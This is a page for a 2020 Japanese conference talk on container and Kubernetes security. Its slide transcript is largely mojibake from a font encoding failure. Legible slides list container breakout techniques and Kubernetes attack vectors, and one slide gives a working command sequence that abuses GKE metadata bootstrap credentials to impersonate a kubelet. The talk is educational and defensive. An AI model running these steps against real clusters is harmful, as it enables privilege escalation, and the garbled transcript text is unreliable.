インフラ基盤技術のセキュリティとこれから

B49933741d74e122bc1314b2975e9fc9?s=47 mrtc0
September 25, 2020

 インフラ基盤技術のセキュリティとこれから

InfraStudy #6 https://forkwell.connpass.com/event/187694/ での発表資料
ターミナルの画像は GIF なのでスライド内のリンクか https://gist.github.com/mrtc0/16f169e679674e43dfbb33ae5b0c4d5e を参照してください。動画は https://www.youtube.com/watch?v=X8HvH3dF6ZM です。

B49933741d74e122bc1314b2975e9fc9?s=128

mrtc0

September 25, 2020
Tweet

Transcript

  1. Πϯϑϥج൫ٕज़ͷηΩϡϦςΟͱ͜Ε͔Β ৿ాߒฏ(.01FQBCP *OD *OGSB4UVEZ ΠϯϑϥͱηΩϡϦςΟͱ ͜Ε͔Β

  2. ৿ాߒฏ!NSUD (.0ϖύϘηΩϡϦςΟରࡦࣨγχΞΤϯδχΞ ηΩϡϦςΟɾΩϟϯϓߨࢣ ηΩϡϦςΟɾΩϟϯϓεςΞϦϯάίϛοςΟ *1"ະ౿ΫϦΤʔλ IUUQTCMPHTTSGJO

  3. ࠓ೔࿩͢͜ͱ wίϯςφ΍,VCFSOFUFTͳͲͷηΩϡϦςΟ wηΩϡϦςΟʹͲ͏޲͖߹͍͔ͬͯ͘ ෼͸ҙ֎ͱ୹͍ͷͰ࿩͍ͨ͜͠ͱશ෦࿩͖͠Εͳ͍ ͳͷͰ࣭ٙԠ౴΍࠙਌ձ౳Ͱ΋ٞ࿦͠·͠ΐ͏

  4. $POUBJOFS4FDVSJUZ

  5. ίϯςφͷ࡞Γํɺյ͠ํ IUUQTTQFBLFSEFDLDPNNSUDDPOUBJOFSTUSVDUVSFBOEFYQMPJUBUJPONFUIPE

  6. -JOVYίϯςφͷ࢓૊Έ wৄ͘͠͸*OGSB4UVEZͷճΛ؍͍ͯͩ͘͞ w-JOVYͷηΩϡϦςΟػߏΛར༻ͯ͠ݖݶ΍Ϧιʔεͷ෼཭ w/BNFTQBDF DHSPVQ $BQBCJMJUZ TFDDPNQ -4. FUD w΋͠ίϯςφͷݖݶ෼཭౳ʹෆඋ͕͋Δ৔߹͸ɺϗετͷSPPUΛऔ

    ಘ͞ΕΔՄೳੑ͕͋Δ
  7. -JOVYίϯςφͷओͳ߈ܸγφϦΦ wίϯςφΠϝʔδͷ੬ऑੑ wίϯςφϥϯλΠϜͷ੬ऑੑٴͼઃఆෆඋ w-JOVYΧʔωϧͷ੬ऑੑ

  8. ίϯςφηΩϡϦςΟͷࢦඪ wίϛϡχςΟ΍ػ͕ؔࡦఆ͍ͯ͠ΔΨΠυϥΠϯΛಡΉͱྑ͍ w$*4#FODINBSLT4FDVSJOH%PDLFS w/*4541"QQMJDBUJPO$POUBJOFS4FDVSJUZ wͿͬͪΌ͚ʮ͑ɺͦ͜·Ͱ͢Δͷʯͱ͍͏ͷ΋͋ΔͷͰɺࣗࣾʹͱͬ ͯͷڴҖ͸Կ͔Λߟ͑ͯखΛೖΕ͍ͯ͘ͷ͕ྑ͍

  9. 4FOTJUJWF'JMF.PVOU wίϯςφ͔ΒಡΈॻ͖Ͱ͖ͯ͸͍͚ͳ͍ϑΝΠϧ͕ଟ਺͋Δ wQSPDLDPSF QSPDTZTSRUSJHHFS w3FBE0OMZʹ͢Δ Ϛ΢ϯτ͠ͳ͍ͳͲͷରԠ wWBSSVOEPDLFSTPDLͷϚ΢ϯτ΋μϝ

  10. $BQBCJMJUZ΍TFDDPNQ w $"1@4:4@"%.*/΍$"1@4:4@153"$& $"1@%"$@3&"%@4&"3$)ͳͲ w ಛݖίϯςφ͸ඇৗʹةݥ w NPVOU Λݺͼग़ͯ͠EFWTEB΍EFWWEBͳͲͷϚ΢ϯτ w

    DHSPVQͷOPUJGZ@PO@SFMFBTFΛར༻ͨ͠#SFBL0VU
  11. DBMM@VTFSNPEFIFMQFS@FYFD wίʔϧόοΫͷΑ͏ʹϓϩάϥϜΛ࣮ߦ͢Δ wSFMFBTF@BHFOU CJOGNU@NJTD DPSF@QBUUFSO VFOWFU@IFMQFSͳͲ w͜ͷ࢓૊ΈΛར༻ͯ͠ϗετଆʹΤεέʔϓͰ͖Δ

  12. #SFBLPVUXJUIVFWFOU@IFMQFS IUUQTBTDJJOFNBPSHB,C5PZ3O%MZD#ULIW)(I1

  13. #SFBLPVUXJUIDHSPVQSFMFBTF@BHFOU IUUQTBTDJJOFNBPSHBO'MP;2V40'%IVGZ28WH

  14. TFDDPNQCZQBTT w-JOVY,FSOFMҎલ͸QUSBDF  Λ࢖ͬͯόΠύεՄೳ IUUQTBTDJJOFNBPSHBK5+N-77Z$D'LJT+910&/L

  15. %FGFOTF*O%FQUI w-JOVYίϯςφ͸ଟ૚๷ޚͰͰ͖͍ͯΔ w͋Δػߏ͕ಥഁ͞Εͯ΋ɺผͷػߏͰ๷͙؇࿨͢Δ wFHTFDDPNQ͕ಥഁ͞Εͯ΋DBQBCJMJUZͰϒϩοΫ w͜ͷ֓೦͸͋ΒΏΔηΩϡϦςΟͷྖҬͰඞཁ

  16. ,VCFSOFUFT4FDVSJUZ

  17. ,VCFSOFUFT4FDVSJUZ w 4FSWJDF"DDPVOUؚΊͨ3#"$ͷઃఆ w ҆શͳίϯςφΠϝʔδͷར༻ w /FUXPSL1PMJDZ w 4FSWJDF.FTI w

    1PE΍ίϯςφͷ$BQBCJMJUZ΍Ϧιʔεઃఆ w 4FDSFUͷ؅ཧ w "VEJU-PH w LVCFBQJTFSWFS΍LVCFMFUͷอޢ w %BTICPBSEͳͲ΁ͷΞΫηε੍ޚ w ,VCFSOFSUFTࣗମ΍ίϯςφϥϯλΠϜ Χʔω ϧͷ੬ऑੑ w ίϯϙʔωϯτؒͷ҆શͳ௨৴ w .FUBEBUB4FSWJDFͷอޢ w "ENJTTJPO$POUSPMMFS1MVHJO w FUDEͷ҉߸Խ w ͳͲͳͲ
  18. ,VCFSOFUFT4FDVSJUZ w ,VCFSOFUFT͸ίϯϙʔωϯτ͕ෳࡶͳͷͰɺطʹެ։͞Ε͍ͯΔڴҖϞσϧͳͲΛࢀߟʹकΔՕॴ ΛܾΊΔ w $/$'ͷϢʔβʔάϧʔϓ͕453*%&Λ༻͍ͨԋशΛߦ͍ͬͯΔ w $*4#FODINBSL΋,VCFSOFUFT&,4(,&",4͋ΔͷͰɺͦͪΒ΋ࢀߟʹ IUUQTHJUIVCDPNDODGpOBODJBMVTFSHSPVQUSFFNBTUFSQSPKFDUTLTUISFBUNPEFM

  19. IUUQTXXXNJDSPTPGUDPNTFDVSJUZCMPHBUUBDLNBUSJYLVCFSOFUFT

  20. "UUBDL7FDUPS 4FSWJDF"DDPVOU 5PLFO 1PEʹϚ΢ϯτ͞ΕΔ4FSWJDF"DDPVOU5PLFOΛѱ༻͢Δɻ ࣗಈͰϚ΢ϯτ͠ͳ͍ɺ3#"$Λద੾ʹઃఆ͢Δɻ 6OBVUIPSJ[FE"1* "1*Λೝূͳ͠Ͱ୭Ͱ΋ୟ͚Δঢ়ଶʹ͠ͳ͍ɻ LVCFBQJTFSWFSͰBOPOZNPVTBVUIUSVFʹ͠ͳ͍ɻ 1PE4FDVSJUZ1PMJDZ (BUFLFFQFS

    ϗετϑΝΠϧͷϚ΢ϯτ΍վ͟ΜͳͲ΁ͷରࡦɻ BMMPXFE)PTU1BUIT΍SFBE0OMZ3PPU'JMFTZTUFN $BQBCJMJUZͷઃఆ FUDEͷ҉߸Խ΍ΞΫ ηε੍ޚ FUDEʹ͸ػີ৘ใؚ͕·Ε͍ͯΔͷͰɺΞΫηε੍ޚ΍҉߸ԽΛࢪ͢ /FUXPSL ଞͷ1PE΍NFUBEBUBTFSWJDF΁ͷΞΫηε /FUXPSL1PMJDZ΍4FSWJDF.FTIͰ੍ޚ 4FDSFUͷ؅ཧ 7$4্ʹ4FDSFUΛͦͷ··؅ཧͯ͠͠·͏ɻ ҉߸ԽΛࢪͨ͠Γ7BVMU΍,.4؅ཧʹ͢ΔͳͲɻ
  21. NFUBEBUBTFSWJDF w Ϋϥ΢υϓϩόΠμʔ͕ఏڙ͍ͯ͠ΔΤϯυϙΠϯτ w IUUQ w *".ͷΫϨσϯγϟϧ΍,VCFSOFUFTͷ؀ڥม਺ͳͲ͕֨ೲ͞Ε͍ͯΔ͜ͱ͕ ͋ΔͨΊɺ1SJWJMFHF&TDBMBUJPOʹར༻͞ΕΔ w ΞϓϦέʔγϣϯϨΠϠ͔Β͸443'ͳͲΛར༻ͯ͠઄औ͞ΕΔ͜ͱ΋

  22. &,4 w Πϯελϯε৘ใͷऔಘ w 71$ 4FDVSJUZ(SPVQ৘ใͷऔಘ w &$3ϦϙδτϦ͔ΒΠϝʔδͷऔಘ IUUQTEPDTBXTBNB[PODPNFLTMBUFTUVTFSHVJEFSFTUSJDUFDDSFEFOUJBMBDDFTTIUNM

  23. (,& w .FUBEBUBLVCFFOWʹ͸CPPUTUSBQॲཧͰ࢖༻͞ΕΔূ໌ॻ౳Λอ࣋ w ͦͷΫϨσϯγϟϧΛ࢖ͬͯ$FSUJpDBUF4JHOJOH3FRVFTUϦιʔεΛ࡞Δ w LVCFDPOUSPMMFSNBOBHFS͸$43Λࣗಈঝೝ͢ΔͷͰLVCFMFUʹͳΓ͢·͢ ͜ͱ͕Ͱ͖Δɻ

  24. &BDIOPEFJOUIFDMVTUFSJTJOKFDUFEXJUIBTIBSFE4FDSFUBUDSFBUJPO XIJDIJUDBO VTFUPTVCNJUDFSUJpDBUFTJHOJOHSFRVFTUTUPUIFDMVTUFSSPPU$"BOEPCUBJOLVCFMFU DMJFOUDFSUJpDBUFT5IFTFDFSUJpDBUFTBSFUIFOVTFECZUIFLVCFMFUUPBVUIFOUJDBUF JUTSFRVFTUTUPUIF"1*TFSWFS/PUFUIBUUIJTTIBSFE4FDSFUJTSFBDIBCMFCZ1PET  VOMFTTNFUBEBUBDPODFBMNFOUJTFOBCMFE IUUQTDMPVEHPPHMFDPNLVCFSOFUFTFOHJOFEPDTDPODFQUTDMVTUFSUSVTU

  25. JNQFSTPOBUFLVCFMFU root@test:/# echo $CA_CERT | base64 -d > bootstrap/ca.crt root@test:/#

    echo $KUBELET_CERT | base64 -d > bootstrap/kubelet-bootstrap.crt` root@test:/# echo $KUBELET_KEY | base64 -d > bootstrap/kubelet-bootstrap.key root@test:/# CURRENT_HOSTNAME="$(curl -s -H 'Metadata-flavor: Google' ${KUBE_HOSTNAME_URL} | awk -F. '{print $1}')" root@test:/# openssl ecparam -genkey -name prime256v1 -out kubelet.key root@test:/tmp# openssl req -new -config /tmp/openssl.cnf -key kubelet.key -out kubelet.csr root@test:/# cat /tmp/kubelet.yaml apiVersion: certificates.k8s.io/v1beta1 kind: CertificateSigningRequest metadata: name: node-csr-gke-sandbox-cluster-default-pool-f9270e72-mg63-2 spec: groups: - system:authenticated request: LS0tLS... ... username: kubelet root@test:/# kubectl create -f /tmp/kubelet.yaml --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client- certificate=bootstrap/kubelet-bootstrap.crt --client-key=bootstrap/kubelet-bootstrap.key root@test:/# kubectl --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=bootstrap/kubelet-bootst client-key=bootstrap/kubelet-bootstrap.key get csr node-csr-gke-sandbox-cluster-default-pool-f9270e72-mg63-2 -o jsonpath='{.status.certificate}' | b /tmp/kubelet.crt
  26. ࣄྫ w 4IPQJGZ443'JO&YDIBOHFMFBETUP3005BDDFTTJOBMMJOTUBODFT w IUUQTIBDLFSPOFDPNSFQPSUT w (JUMBC443'JOUP4IBSFE3VOOFS CZSFQMBDJOHEPDLFSEXJUINBMJDJPVTTFSWFSJO&YFDVUPS w IUUQTIBDLFSPOFDPNSFQPSUT

    w μογϡϘʔυҎ֎ʹ΋8FBWF4DPQF΍LVCFqPXΛૂͬͨ߈ܸ w IUUQTXXXXFBWFXPSLTCMPHQSFWFOUJOHNBMJDJPVTVTFPGXFBWFTDPQF w IUUQTXXXNJDSPTPGUDPNTFDVSJUZCMPHNJTDPOpHVSFELVCFqPX XPSLMPBETBSFBTFDVSJUZSJTL
  27. Ͳ͏΍ͬͯ޲͖߹͍͔ͬͯ͘

  28. Ϋϥ΢υͰͷ੹೚ڞ༗Ϟσϧ wΫϥ΢υϓϩύΠμ͸Ͳ͜·Ͱकͬͯ͘ΕΔΜ͚ͩͬʁ wϢʔβʔ͸Ͳ͜ΛकΔඞཁ͕͋ΔΜ͚ͩͬʁ ग़యIUUQTMFBSOHJUMBCDPNOFYUHFOTPGUXBSFTFDVSJUZTUFQTDJTPTFDVSFOFYUHFOTPGUXBSF

  29. Ͳ͏޲͖߹͍͔ͬͯ͘ wج൫पΓͷਐԽ͸ૣ͍ͷͰɺηΩϡϦςΟରԠ͕ٻΊΒΕͨλΠϛϯ άͩͱ࠷৽όʔδϣϯͱࠩҟ͕ wηΩϡϦςΟʹؔ͢ΔΨΠυϥΠϯ͕ͳ͍ͷͰɺαʔϏεʹΑͬͯη ΩϡϦςΟϨϕϧ͕·ͪ·ͪ

  30. %FW4FD0QT wͦ΋ͦ΋ɺηΩϡϦςΟͷจԽΛ࡞Δඞཁ͕͋Δ wΨΠυϥΠϯ΍ڴҖϞσϧΛߏங wෳࡶ͞Λந৅Խ͢ΔͨΊͷࣗಈԽɺج൫ͮ͘Γ w$P $PNNVOJDBUJPO $PNQMFUFOFTT $POUJOVPVT  w5%4

    5FTU%SJWFO4FDVSJUZ
  31. ܅΋ϖύϘͰಇ͔ͳ͍͔ʁ ࠷৽ͷ࠾༻৘ใΛνΣοΫˠ !QC@SFDSVJU